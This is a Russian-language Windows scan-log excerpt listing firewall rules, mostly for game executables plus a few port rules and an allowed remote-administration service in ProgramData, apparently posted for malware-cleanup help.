FirewallRules: [TCP Query User{4D5E437B-0A0E-4D43-B052-3F3A465BC3A4}D:\калибр\caliber.exe] => (Allow) D:\калибр\caliber.exe => Нет файла
FirewallRules: [UDP Query User{8725AF27-7A77-4CC9-95CA-53769043E631}D:\калибр\caliber.exe] => (Allow) D:\калибр\caliber.exe => Нет файла
FirewallRules: [{CA6A336F-E6D8-47B6-81B5-16F95654541A}] => (Allow) C:\Users\User\Downloads\PlayCombatarms.exe => Нет файла
FirewallRules: [{AF1DB63C-6E1A-4CD3-9F16-B5B01C50ACA0}] => (Allow) C:\Users\User\Downloads\PlayCombatarms.exe => Нет файла
FirewallRules: [{FCFD9BF4-5DE5-4808-8D05-86FCC71EC548}] => (Allow) D:\Games\CombatArms\live\NMService.exe => Нет файла
FirewallRules: [{23BD5721-2124-4518-9F31-97E802437883}] => (Allow) D:\Games\CombatArms\live\NMService.exe => Нет файла
FirewallRules: [{EC73635A-DB01-49CA-A2C0-BDC41E590BF4}] => (Allow) D:\Arma 2 Combined Operations\arma2.exe => Нет файла
FirewallRules: [{77FD9302-12AE-4E81-A234-E101F82CDAF7}] => (Allow) D:\Arma 2 Combined Operations\arma2.exe => Нет файла
FirewallRules: [{DEF445C6-5466-4B71-9404-20DCAC2AA9F1}] => (Allow) D:\Arma 2 Combined Operations\arma2OA.exe => Нет файла
FirewallRules: [{256A4193-B262-40B9-8806-A37C4E467269}] => (Allow) D:\Arma 2 Combined Operations\arma2OA.exe => Нет файла
FirewallRules: [{36185B91-D300-434D-A0C1-E87CCFC4FFE8}] => (Allow) C:\Program Files (x86)\Playkey\Playkey.exe => Нет файла
FirewallRules: [{CC07BB43-521F-4F32-AD63-FC1D4CF1F4B5}] => (Allow) C:\Users\User\AppData\Local\Temp\PlaykeyUpdater.exe => Нет файла
FirewallRules: [{27C23F00-C509-4C5C-B43F-230E8773F610}] => (Allow) C:\Program Files (x86)\Playkey\crashpad_handler.exe => Нет файла
FirewallRules: [{93A1D238-8EDB-45DA-AC06-32CC95E554CF}] => (Allow) C:\Program Files (x86)\Playkey\PlaykeyOffers.exe => Нет файла
FirewallRules: [TCP Query User{4E9068BD-CD81-433A-A3F4-EF4EBA42FBD7}D:\far cry 4\bin\farcry4.exe] => (Allow) D:\far cry 4\bin\farcry4.exe => Нет файла
FirewallRules: [UDP Query User{C7E5F061-2EE4-41D9-8A11-23779471B8F5}D:\far cry 4\bin\farcry4.exe] => (Allow) D:\far cry 4\bin\farcry4.exe => Нет файла
FirewallRules: [TCP Query User{0EF0E669-3375-471B-A8B1-EA67D84FB67E}D:\games\dishonored - goty\binaries\win32\dishonored.exe] => (Allow) D:\games\dishonored - goty\binaries\win32\dishonored.exe => Нет файла
FirewallRules: [UDP Query User{EBE03826-79C3-40B3-974A-CE5832961CE9}D:\games\dishonored - goty\binaries\win32\dishonored.exe] => (Allow) D:\games\dishonored - goty\binaries\win32\dishonored.exe => Нет файла
FirewallRules: [TCP Query User{0BA39A99-7055-4025-B82A-F8D2705946C9}D:\far cry 3\bin\farcry3.exe] => (Block) D:\far cry 3\bin\farcry3.exe => Нет файла
FirewallRules: [UDP Query User{95BC1CC5-F3C0-499F-BD1A-DBCA65B34BB9}D:\far cry 3\bin\farcry3.exe] => (Block) D:\far cry 3\bin\farcry3.exe => Нет файла
FirewallRules: [TCP Query User{F13BBA19-4D8F-4574-8553-F5A8D0D4B486}D:\far cry 3\bin\farcry3_d3d11.exe] => (Allow) D:\far cry 3\bin\farcry3_d3d11.exe => Нет файла
FirewallRules: [UDP Query User{88574950-5CD0-4552-8976-B17C7FC2040C}D:\far cry 3\bin\farcry3_d3d11.exe] => (Allow) D:\far cry 3\bin\farcry3_d3d11.exe => Нет файла
FirewallRules: [TCP Query User{4E026A55-FD4B-4E19-8CFF-E999F5D1DF2D}D:\counter-strike 1.6 sahar\hl.exe] => (Block) D:\counter-strike 1.6 sahar\hl.exe => Нет файла
FirewallRules: [UDP Query User{4A08AC37-39E8-4EB7-A4DD-72A7E2A91393}D:\counter-strike 1.6 sahar\hl.exe] => (Block) D:\counter-strike 1.6 sahar\hl.exe => Нет файла
FirewallRules: [TCP Query User{159F3AE8-6AD4-46B5-9F1B-E0EC0D2D2785}D:\arduino\java\bin\javaw.exe] => (Allow) D:\arduino\java\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{D3FDE5F6-1B7E-4729-B506-BFAF80A4BF3F}D:\arduino\java\bin\javaw.exe] => (Allow) D:\arduino\java\bin\javaw.exe => Нет файла
FirewallRules: [{691211C0-8D39-48D9-9B70-A5E51D460C10}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe => Нет файла
FirewallRules: [{1CB2933D-3D4B-4BFE-92F8-11A00BBF619E}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe => Нет файла
FirewallRules: [{6F75A0DE-2DB3-4EBB-A0A6-B0026D45A8BA}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe => Нет файла
FirewallRules: [{4CCD84A2-05F4-484F-A0FB-85129D5F01A1}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe => Нет файла
FirewallRules: [{0A33BC45-98F3-4896-A9D4-44B03EDE0953}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\GTAIV.exe => Нет файла
FirewallRules: [{AD28E9D7-F572-421F-A176-C9EBA90C947F}] => (Allow) C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\GTAIV.exe => Нет файла
FirewallRules: [TCP Query User{EA650D67-10D4-4333-B214-7D758240608A}D:\assassin's creed.revelations.v 1.03 + 6 dlc\acrsp.exe] => (Allow) D:\assassin's creed.revelations.v 1.03 + 6 dlc\acrsp.exe => Нет файла
FirewallRules: [UDP Query User{7AC3F90B-CBF5-4B05-8055-78F6AA3DC243}D:\assassin's creed.revelations.v 1.03 + 6 dlc\acrsp.exe] => (Allow) D:\assassin's creed.revelations.v 1.03 + 6 dlc\acrsp.exe => Нет файла
FirewallRules: [TCP Query User{2F4BC947-CD2D-4F95-9FD3-3F15C6212B2D}C:\program files (x86)\r.g. freedom\police tactics imperio\policetactics.exe] => (Allow) C:\program files (x86)\r.g. freedom\police tactics imperio\policetactics.exe => Нет файла
FirewallRules: [UDP Query User{75052CE6-5C41-4356-A048-9696D431795D}C:\program files (x86)\r.g. freedom\police tactics imperio\policetactics.exe] => (Allow) C:\program files (x86)\r.g. freedom\police tactics imperio\policetactics.exe => Нет файла
FirewallRules: [TCP Query User{A7F290D8-FCED-4F50-A212-33185DD7FCCA}D:\kenshi v1.0.45\kenshi_x64.exe] => (Allow) D:\kenshi v1.0.45\kenshi_x64.exe => Нет файла
FirewallRules: [UDP Query User{E4F685BD-AA44-491D-A3FD-068ED46C4183}D:\kenshi v1.0.45\kenshi_x64.exe] => (Allow) D:\kenshi v1.0.45\kenshi_x64.exe => Нет файла
FirewallRules: [TCP Query User{EE4E75DD-C631-4295-B420-16DA5458F1EC}D:\stalker call of pripyat\bin\xrengine.exe] => (Block) D:\stalker call of pripyat\bin\xrengine.exe => Нет файла
FirewallRules: [UDP Query User{B587CC4F-9D34-4B1C-9667-5197274D6ADB}D:\stalker call of pripyat\bin\xrengine.exe] => (Block) D:\stalker call of pripyat\bin\xrengine.exe => Нет файла
FirewallRules: [TCP Query User{A236EE7D-90E7-4263-961C-3B2F8B554BF3}D:\cs source v34 russian\hl2.exe] => (Allow) D:\cs source v34 russian\hl2.exe => Нет файла
FirewallRules: [UDP Query User{36839414-5D8C-448A-A19D-8BEB8AC41549}D:\cs source v34 russian\hl2.exe] => (Allow) D:\cs source v34 russian\hl2.exe => Нет файла
FirewallRules: [TCP Query User{653AF126-E04F-4AF0-8DCB-865D62CFF4AD}C:\program files (x86)\dead island riptide\deadislandgame_x86_rwdi.exe] => (Allow) C:\program files (x86)\dead island riptide\deadislandgame_x86_rwdi.exe => Нет файла
FirewallRules: [UDP Query User{CD14DE95-C650-4E05-B641-1990951B0C19}C:\program files (x86)\dead island riptide\deadislandgame_x86_rwdi.exe] => (Allow) C:\program files (x86)\dead island riptide\deadislandgame_x86_rwdi.exe => Нет файла
FirewallRules: [TCP Query User{B5C61448-BE17-4F97-992E-CA2228C91A76}D:\dead island\deadislandgame.exe] => (Allow) D:\dead island\deadislandgame.exe => Нет файла
FirewallRules: [UDP Query User{F4F6BBD3-3ECE-431D-8099-9A04F3366FA5}D:\dead island\deadislandgame.exe] => (Allow) D:\dead island\deadislandgame.exe => Нет файла
FirewallRules: [TCP Query User{B3367040-36BA-4742-ADFD-BFB3FCEE32CB}D:\clone drone in the danger zone v0.18.0.2\clone drone in the danger zone.exe] => (Allow) D:\clone drone in the danger zone v0.18.0.2\clone drone in the danger zone.exe => Нет файла
FirewallRules: [UDP Query User{F25B9526-1D40-404A-9C58-22296C7D24E3}D:\clone drone in the danger zone v0.18.0.2\clone drone in the danger zone.exe] => (Allow) D:\clone drone in the danger zone v0.18.0.2\clone drone in the danger zone.exe => Нет файла
FirewallRules: [TCP Query User{336F0820-EDED-4227-ABE2-CA776A91F647}C:\program files (x86)\zlorigin\zclient\zclient.exe] => (Allow) C:\program files (x86)\zlorigin\zclient\zclient.exe => Нет файла
FirewallRules: [UDP Query User{DE9684AB-E120-421F-988C-B958926D6EDC}C:\program files (x86)\zlorigin\zclient\zclient.exe] => (Allow) C:\program files (x86)\zlorigin\zclient\zclient.exe => Нет файла
FirewallRules: [TCP Query User{6E1D1FC8-7ECE-47A1-A894-B8A1F0CC1736}C:\users\user\appdata\local\temp\nsu993d.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsu993d.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [UDP Query User{B116BEA6-BE03-4C8E-BE03-7AB727C9E265}C:\users\user\appdata\local\temp\nsu993d.tmp\app\prbf2-download-assistant.exe] => (Allow) C:\users\user\appdata\local\temp\nsu993d.tmp\app\prbf2-download-assistant.exe => Нет файла
FirewallRules: [TCP Query User{469ABD55-3DF5-4FBE-AA30-8242FB41A2AE}D:\project reality bf2\prbf2.exe] => (Block) D:\project reality bf2\prbf2.exe => Нет файла
FirewallRules: [UDP Query User{5F5AC565-F5F3-417B-9231-481A579B5A3A}D:\project reality bf2\prbf2.exe] => (Block) D:\project reality bf2\prbf2.exe => Нет файла
FirewallRules: [{15EAE3FD-38AB-458D-B422-1BAE7BFFF417}] => (Allow) C:\Users\User\AppData\Roaming\Zoom\bin\airhost.exe => Нет файла
FirewallRules: [{5BBCD99B-4EAA-49D6-AD9E-EF218DD1E4A9}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe => Нет файла
FirewallRules: [{BA98F362-D5B2-460A-8860-6DBB794D97CA}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe => Нет файла
FirewallRules: [TCP Query User{01A22F60-9165-4208-AB18-CFB0F5A17FB7}C:\users\user\desktop\averange rp\samp-server.exe] => (Allow) C:\users\user\desktop\averange rp\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{C35FF2A2-34A5-4F2C-8833-02A89F519C63}C:\users\user\desktop\averange rp\samp-server.exe] => (Allow) C:\users\user\desktop\averange rp\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{ACD6B565-B6A3-46CB-BD95-712A9FC8AE79}C:\games\counter-strike с читами\hl.exe] => (Allow) C:\games\counter-strike с читами\hl.exe => Нет файла
FirewallRules: [UDP Query User{6CDDA7C2-1D25-4BD9-B2BF-52E80C4A8921}C:\games\counter-strike с читами\hl.exe] => (Allow) C:\games\counter-strike с читами\hl.exe => Нет файла
FirewallRules: [TCP Query User{FF23302A-0E4E-411A-81D5-42BFF154C011}C:\users\user\desktop\скетчи\arduino-1.8.13\java\bin\javaw.exe] => (Block) C:\users\user\desktop\скетчи\arduino-1.8.13\java\bin\javaw.exe => Нет файла
FirewallRules: [UDP Query User{2E3B90B3-0EA1-4041-9961-6FDAEFB7A181}C:\users\user\desktop\скетчи\arduino-1.8.13\java\bin\javaw.exe] => (Block) C:\users\user\desktop\скетчи\arduino-1.8.13\java\bin\javaw.exe => Нет файла
FirewallRules: [TCP Query User{CEE8688C-7FE4-4CD4-AB1D-61BE4148654F}C:\users\user\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\user\appdata\local\gamecenter\gamecenter.exe => Нет файла
FirewallRules: [UDP Query User{EC1FFC2F-C598-434C-B1B9-1EB3CD37C06D}C:\users\user\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\user\appdata\local\gamecenter\gamecenter.exe => Нет файла
FirewallRules: [TCP Query User{EFE96E49-D072-4999-BEC0-F1050A095679}D:\warface\bin64release\game.exe] => (Allow) D:\warface\bin64release\game.exe => Нет файла
FirewallRules: [UDP Query User{676F538B-0C81-4ACF-BFEE-DB90AFBCDF23}D:\warface\bin64release\game.exe] => (Allow) D:\warface\bin64release\game.exe => Нет файла
FirewallRules: [TCP Query User{1ED20252-7130-484B-A0A8-62807F6196DD}D:\ruinarch v0.33.13\ruinarch.exe] => (Allow) D:\ruinarch v0.33.13\ruinarch.exe => Нет файла
FirewallRules: [UDP Query User{B0D3F37A-FFAF-4E80-AE73-AB7F9B8E784A}D:\ruinarch v0.33.13\ruinarch.exe] => (Allow) D:\ruinarch v0.33.13\ruinarch.exe => Нет файла
FirewallRules: [TCP Query User{7DFBC546-240C-4CF7-A2D3-DF1DE6E1041D}D:\ruinarch v0.33.13 fixed\ruinarch.exe] => (Allow) D:\ruinarch v0.33.13 fixed\ruinarch.exe => Нет файла
FirewallRules: [UDP Query User{873E879B-C6E6-4C6A-A21C-D6A6C3530214}D:\ruinarch v0.33.13 fixed\ruinarch.exe] => (Allow) D:\ruinarch v0.33.13 fixed\ruinarch.exe => Нет файла
FirewallRules: [TCP Query User{DD5788B4-3AAF-4939-8973-9A52FBAC3E57}D:\dishonored - game of the year edition\binaries\win32\dishonored.exe] => (Allow) D:\dishonored - game of the year edition\binaries\win32\dishonored.exe => Нет файла
FirewallRules: [UDP Query User{24E2A38D-6F82-47F2-94D7-7706F8BD90BF}D:\dishonored - game of the year edition\binaries\win32\dishonored.exe] => (Allow) D:\dishonored - game of the year edition\binaries\win32\dishonored.exe => Нет файла
FirewallRules: [TCP Query User{2B6B168B-9F16-4081-A3E3-3FB321B3787C}C:\users\user\desktop\игры в которые играю в данный момент\averange rp\samp-server.exe] => (Allow) C:\users\user\desktop\игры в которые играю в данный момент\averange rp\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{B73B3872-1E57-4D5A-8296-F19020C85416}C:\users\user\desktop\игры в которые играю в данный момент\averange rp\samp-server.exe] => (Allow) C:\users\user\desktop\игры в которые играю в данный момент\averange rp\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{5566979F-6CAB-499A-828E-E08E9F74E587}C:\users\user\desktop\игры в которые играю в данный момент\все для самп\сервер\samp-server.exe] => (Allow) C:\users\user\desktop\игры в которые играю в данный момент\все для самп\сервер\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{77C0842F-131A-42A7-8B5C-013865C01223}C:\users\user\desktop\игры в которые играю в данный момент\все для самп\сервер\samp-server.exe] => (Allow) C:\users\user\desktop\игры в которые играю в данный момент\все для самп\сервер\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{F273FF0B-A96B-4BC7-903C-B4FD481B61CF}D:\cybermotion v0.13\cybermotion.exe] => (Allow) D:\cybermotion v0.13\cybermotion.exe => Нет файла
FirewallRules: [UDP Query User{2820A7A0-693E-42AA-82F9-6BC7220BA162}D:\cybermotion v0.13\cybermotion.exe] => (Allow) D:\cybermotion v0.13\cybermotion.exe => Нет файла
FirewallRules: [TCP Query User{DD5A7AE8-77BA-4C24-8D29-11C478CF6E46}D:\dayz\dayz_x64.exe] => (Allow) D:\dayz\dayz_x64.exe => Нет файла
FirewallRules: [UDP Query User{B9F79E62-77B1-4CD2-9D1F-6F43A49A19B1}D:\dayz\dayz_x64.exe] => (Allow) D:\dayz\dayz_x64.exe => Нет файла
FirewallRules: [TCP Query User{FED3EB78-C24F-4DF3-8B3D-F9E2F0CEAA74}E:\drivers\sdi_x64_r2009.exe] => (Block) E:\drivers\sdi_x64_r2009.exe => Нет файла
FirewallRules: [UDP Query User{F1767751-0B04-43CD-BFBA-FF760E2F3887}E:\drivers\sdi_x64_r2009.exe] => (Block) E:\drivers\sdi_x64_r2009.exe => Нет файла
FirewallRules: [TCP Query User{537AAD49-8ED7-4A13-93F9-AE733E7374BE}D:\door kickers 2 v0.5\doorkickers2.exe] => (Allow) D:\door kickers 2 v0.5\doorkickers2.exe => Нет файла
FirewallRules: [UDP Query User{CD97194B-3F92-46E2-84DF-60693596EE79}D:\door kickers 2 v0.5\doorkickers2.exe] => (Allow) D:\door kickers 2 v0.5\doorkickers2.exe => Нет файла
FirewallRules: [TCP Query User{3480BEDE-177E-42BD-9072-E9C657B08782}C:\users\user\desktop\rol.exe] => (Allow) C:\users\user\desktop\rol.exe => Нет файла
FirewallRules: [UDP Query User{0EDF21D5-324F-417F-A5C5-F7AF84723E2C}C:\users\user\desktop\rol.exe] => (Allow) C:\users\user\desktop\rol.exe => Нет файла
FirewallRules: [TCP Query User{A26C68AA-6AC4-47AB-8FFF-D6A3188A88DB}D:\splinter cell - blacklist\src\system\blacklist_dx11_game.exe] => (Allow) D:\splinter cell - blacklist\src\system\blacklist_dx11_game.exe => Нет файла
FirewallRules: [UDP Query User{70FAFC2C-9C5E-4F97-8FD0-A92B6B7C6EE0}D:\splinter cell - blacklist\src\system\blacklist_dx11_game.exe] => (Allow) D:\splinter cell - blacklist\src\system\blacklist_dx11_game.exe => Нет файла
FirewallRules: [TCP Query User{896FD526-E9A8-44C2-94DD-B4184B83BD80}D:\celestial command\celestialcommand.exe] => (Allow) D:\celestial command\celestialcommand.exe => Нет файла
FirewallRules: [UDP Query User{C4BC0699-EED1-4E68-AE76-4C0F79B5F85C}D:\celestial command\celestialcommand.exe] => (Allow) D:\celestial command\celestialcommand.exe => Нет файла
FirewallRules: [TCP Query User{F47E50DC-9E99-4110-883B-623BD7277CBD}C:\users\user\appdata\local\temp\rar$exa0.213\demolition company gold edition\game.exe] => (Allow) C:\users\user\appdata\local\temp\rar$exa0.213\demolition company gold edition\game.exe => Нет файла
FirewallRules: [UDP Query User{2C9D03DB-5213-446D-90F9-79C7019766DF}C:\users\user\appdata\local\temp\rar$exa0.213\demolition company gold edition\game.exe] => (Allow) C:\users\user\appdata\local\temp\rar$exa0.213\demolition company gold edition\game.exe => Нет файла
FirewallRules: [TCP Query User{B7D6D9AC-54F7-4B8B-8EE5-57137FB1DEE8}D:\insurgency\insurgency.exe] => (Allow) D:\insurgency\insurgency.exe => Нет файла
FirewallRules: [UDP Query User{D3B07288-749D-4160-8E6E-64E045AEBF8C}D:\insurgency\insurgency.exe] => (Allow) D:\insurgency\insurgency.exe => Нет файла
FirewallRules: [TCP Query User{6CE2DA4E-23C7-4C1F-9038-97E3CB459F85}D:\insurgency\bin\crash_handler.exe] => (Allow) D:\insurgency\bin\crash_handler.exe => Нет файла
FirewallRules: [UDP Query User{424013E6-DA2F-4E02-B688-DEA3987CBA47}D:\insurgency\bin\crash_handler.exe] => (Allow) D:\insurgency\bin\crash_handler.exe => Нет файла
FirewallRules: [{5EADA70E-B2FD-488F-9DA8-32F35A8DC55E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => Нет файла
FirewallRules: [{497C3C17-7945-41AD-8EF3-AFCEFB686BF4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => Нет файла
FirewallRules: [TCP Query User{1EDC8EE7-A364-46A3-9579-1428CFC2256A}D:\tabs v0.13.0 beta patch 1\totallyaccuratebattlesimulator.exe] => (Block) D:\tabs v0.13.0 beta patch 1\totallyaccuratebattlesimulator.exe => Нет файла
FirewallRules: [UDP Query User{3B5AEC8C-0EF6-47B5-BFC0-53E64CD22C15}D:\tabs v0.13.0 beta patch 1\totallyaccuratebattlesimulator.exe] => (Block) D:\tabs v0.13.0 beta patch 1\totallyaccuratebattlesimulator.exe => Нет файла
FirewallRules: [TCP Query User{871D0AB5-7F09-4EEC-ACA4-C8DFEF9830C1}D:\dead island - definitive edition\deadislandgame.exe] => (Allow) D:\dead island - definitive edition\deadislandgame.exe => Нет файла
FirewallRules: [UDP Query User{1D749813-EDAD-4831-AA9C-4E55C3B91F32}D:\dead island - definitive edition\deadislandgame.exe] => (Allow) D:\dead island - definitive edition\deadislandgame.exe => Нет файла
FirewallRules: [{38CA5F3C-8CE0-4264-85CA-1B1EFEFBF775}] => (Allow) C:\ProgramData\Windows\rutserv.exe => Нет файла
FirewallRules: [{DF430D36-0794-4BD8-ACC8-1F0AFC39D2C6}] => (Block) LPort=445
FirewallRules: [{7967878C-7487-4A8A-8661-0F651BA216C0}] => (Block) LPort=445
FirewallRules: [{6E96EC77-2D92-4711-A590-DCAF0E0AEA6C}] => (Block) LPort=139
FirewallRules: [{A07D26E1-5324-4569-B74C-0BBF3F0C6215}] => (Block) LPort=139
FirewallRules: [{49622ECF-A709-4255-9CB1-FC42781E1117}] => (Allow) LPort=3389
FirewallRules: [{B64CA012-5A88-4791-8F50-2E6C49D37100}] => (Allow) LPort=3389
FirewallRules: [TCP Query User{421C503A-930C-45EA-B18C-72F7140C6217}D:\plague md v14.11.2020\plaguemd.exe] => (Allow) D:\plague md v14.11.2020\plaguemd.exe => Нет файла
FirewallRules: [UDP Query User{DB787319-B7C1-49DE-AA11-41CC69326272}D:\plague md v14.11.2020\plaguemd.exe] => (Allow) D:\plague md v14.11.2020\plaguemd.exe => Нет файла
FirewallRules: [TCP Query User{66CAAA5E-BB95-4AFF-AD6D-D78C956E291F}C:\users\user\desktop\сервак\samp-server.exe] => (Allow) C:\users\user\desktop\сервак\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{48CEA04A-796A-4858-BDAE-BB0FF938B791}C:\users\user\desktop\сервак\samp-server.exe] => (Allow) C:\users\user\desktop\сервак\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{6982737C-EEC3-4D8F-B62D-89E0CCBBF939}C:\users\user\desktop\average\samp-server.exe] => (Allow) C:\users\user\desktop\average\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{DB502B0E-C43C-472B-9541-6F61BC4F21F2}C:\users\user\desktop\average\samp-server.exe] => (Allow) C:\users\user\desktop\average\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{CACF5028-0886-41B9-A8FE-AEEFE49033D8}D:\games\craft the world\craftworld.exe] => (Allow) D:\games\craft the world\craftworld.exe => Нет файла
FirewallRules: [UDP Query User{6E4B81E0-8B8A-4459-AFB1-0925C7FD5E65}D:\games\craft the world\craftworld.exe] => (Allow) D:\games\craft the world\craftworld.exe => Нет файла
FirewallRules: [TCP Query User{2447457C-E1A1-4C97-8BDB-E5D79CD2C796}D:\valheim\valheim.exe] => (Allow) D:\valheim\valheim.exe => Нет файла
FirewallRules: [UDP Query User{174A4816-CD23-4523-8164-80475BEE5957}D:\valheim\valheim.exe] => (Allow) D:\valheim\valheim.exe => Нет файла
FirewallRules: [TCP Query User{28291834-3EE4-472D-86B4-B292DFA1BC7C}D:\chivalry medieval warfare\binaries\win32\cmw.exe] => (Allow) D:\chivalry medieval warfare\binaries\win32\cmw.exe => Нет файла
FirewallRules: [UDP Query User{53E18FDA-48D6-4E95-B049-F5F1AA458800}D:\chivalry medieval warfare\binaries\win32\cmw.exe] => (Allow) D:\chivalry medieval warfare\binaries\win32\cmw.exe => Нет файла
FirewallRules: [TCP Query User{C0662C77-D158-44B5-BA37-D439CF1ABF1F}D:\chivalry medieval warfare\cdw\binaries\win32\cdw.exe] => (Allow) D:\chivalry medieval warfare\cdw\binaries\win32\cdw.exe => Нет файла
FirewallRules: [UDP Query User{7150DFB4-95C7-4BF4-B665-6F114E87B1E9}D:\chivalry medieval warfare\cdw\binaries\win32\cdw.exe] => (Allow) D:\chivalry medieval warfare\cdw\binaries\win32\cdw.exe => Нет файла
FirewallRules: [TCP Query User{D56B4F00-1AC0-4CA8-9FC4-32E44B689CFC}C:\users\user\desktop\сервер 1.6\hlds.exe] => (Allow) C:\users\user\desktop\сервер 1.6\hlds.exe => Нет файла
FirewallRules: [UDP Query User{4C25A956-7C2E-43D5-BF5D-9E85D91392DD}C:\users\user\desktop\сервер 1.6\hlds.exe] => (Allow) C:\users\user\desktop\сервер 1.6\hlds.exe => Нет файла
FirewallRules: [TCP Query User{D57C3910-8E76-4C91-84C1-ED277C59FB19}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe => Нет файла
FirewallRules: [UDP Query User{AA9B63EF-9AD7-4EEA-A360-CAD874F6AF21}D:\counter-strike 1.6\hl.exe] => (Allow) D:\counter-strike 1.6\hl.exe => Нет файла
FirewallRules: [TCP Query User{D9A61032-473D-45F3-A067-D5C122FACBAD}D:\factorio v1.1.27\bin\x64\factorio.exe] => (Block) D:\factorio v1.1.27\bin\x64\factorio.exe => Нет файла
FirewallRules: [UDP Query User{E95045D7-F0EA-47B3-A571-867842A09AFE}D:\factorio v1.1.27\bin\x64\factorio.exe] => (Block) D:\factorio v1.1.27\bin\x64\factorio.exe => Нет файла
FirewallRules: [TCP Query User{900EDEDE-FA5D-4F3C-9FB3-7CC8D87C8C25}D:\project zomboid v41.50\projectzomboid64.exe] => (Block) D:\project zomboid v41.50\projectzomboid64.exe => Нет файла
FirewallRules: [UDP Query User{843A48F9-96B8-4FA3-B1C4-E3FCB4FEAC0F}D:\project zomboid v41.50\projectzomboid64.exe] => (Block) D:\project zomboid v41.50\projectzomboid64.exe => Нет файла
FirewallRules: [TCP Query User{AD821DBB-EDE4-4BBB-B253-619A0DFB1DDA}D:\the escapists 2 v25.07.2020\theescapists2.exe] => (Block) D:\the escapists 2 v25.07.2020\theescapists2.exe => Нет файла
FirewallRules: [UDP Query User{57070674-807F-4E80-B03C-4FF947D22159}D:\the escapists 2 v25.07.2020\theescapists2.exe] => (Block) D:\the escapists 2 v25.07.2020\theescapists2.exe => Нет файла
FirewallRules: [TCP Query User{B4CB44AC-E07B-46C5-92B0-2C9851981F6B}C:\users\user\desktop\важные текстовики\average\samp-server.exe] => (Allow) C:\users\user\desktop\важные текстовики\average\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{5F0BA798-A352-4B07-9159-A2FCE605070A}C:\users\user\desktop\важные текстовики\average\samp-server.exe] => (Allow) C:\users\user\desktop\важные текстовики\average\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{3348D08E-BAA8-42CA-AC68-B7976A284BCB}C:\users\user\desktop\queen rp\samp-server.exe] => (Block) C:\users\user\desktop\queen rp\samp-server.exe => Нет файла
FirewallRules: [UDP Query User{7AD3D7CA-3E6A-484E-AF91-2C3C295D116F}C:\users\user\desktop\queen rp\samp-server.exe] => (Block) C:\users\user\desktop\queen rp\samp-server.exe => Нет файла
FirewallRules: [TCP Query User{0C3C820A-F584-4A20-A741-D7B69179DAD0}D:\oxygen not included v461546\oxygennotincluded.exe] => (Block) D:\oxygen not included v461546\oxygennotincluded.exe => Нет файла
FirewallRules: [UDP Query User{B677FE35-95F6-4D50-87DA-C6AD8928C5A4}D:\oxygen not included v461546\oxygennotincluded.exe] => (Block) D:\oxygen not included v461546\oxygennotincluded.exe => Нет файла
FirewallRules: [TCP Query User{2BCA74E5-BAE9-4FBA-BA66-3C562DDBBF47}D:\people playground v1.18 preview 1\people playground.exe] => (Allow) D:\people playground v1.18 preview 1\people playground.exe => Нет файла
FirewallRules: [UDP Query User{46E0B591-B12C-4388-BEB7-0A70CF2D71CC}D:\people playground v1.18 preview 1\people playground.exe] => (Allow) D:\people playground v1.18 preview 1\people playground.exe => Нет файла
FirewallRules: [TCP Query User{C635ABA2-C0E1-4F2D-B392-FD8A862C23EC}D:\pixphys v0.7.6\pixphys.exe] => (Allow) D:\pixphys v0.7.6\pixphys.exe => Нет файла
FirewallRules: [UDP Query User{2630AB5E-FE7E-4B0C-9C4A-74F8CC27D849}D:\pixphys v0.7.6\pixphys.exe] => (Allow) D:\pixphys v0.7.6\pixphys.exe => Нет файла
FirewallRules: [TCP Query User{E4E4D2E3-9E7C-4BD8-BD75-F375C7221AB7}D:\people playground v1.18.1\people playground.exe] => (Allow) D:\people playground v1.18.1\people playground.exe => Нет файла
FirewallRules: [UDP Query User{D85BFC65-578C-4407-AB33-B629BA1D2D3C}D:\people playground v1.18.1\people playground.exe] => (Allow) D:\people playground v1.18.1\people playground.exe => Нет файла
FirewallRules: [TCP Query User{33167B6F-6C6D-4A65-9178-716E6E74C6AB}D:\viscera cleanup detail v1.135\binaries\win64\udk.exe] => (Allow) D:\viscera cleanup detail v1.135\binaries\win64\udk.exe => Нет файла
FirewallRules: [UDP Query User{B7018E6B-DE01-4BC4-83A1-A49AC91F150C}D:\viscera cleanup detail v1.135\binaries\win64\udk.exe] => (Allow) D:\viscera cleanup detail v1.135\binaries\win64\udk.exe => Нет файла
FirewallRules: [TCP Query User{8364A2F3-FF65-49E0-B069-78E2F5BE3D27}D:\people playground v1.19 hotfix\people playground.exe] => (Allow) D:\people playground v1.19 hotfix\people playground.exe => Нет файла
FirewallRules: [UDP Query User{DAB03BBF-2619-4FFA-9BD3-DD3345FC224C}D:\people playground v1.19 hotfix\people playground.exe] => (Allow) D:\people playground v1.19 hotfix\people playground.exe => Нет файла
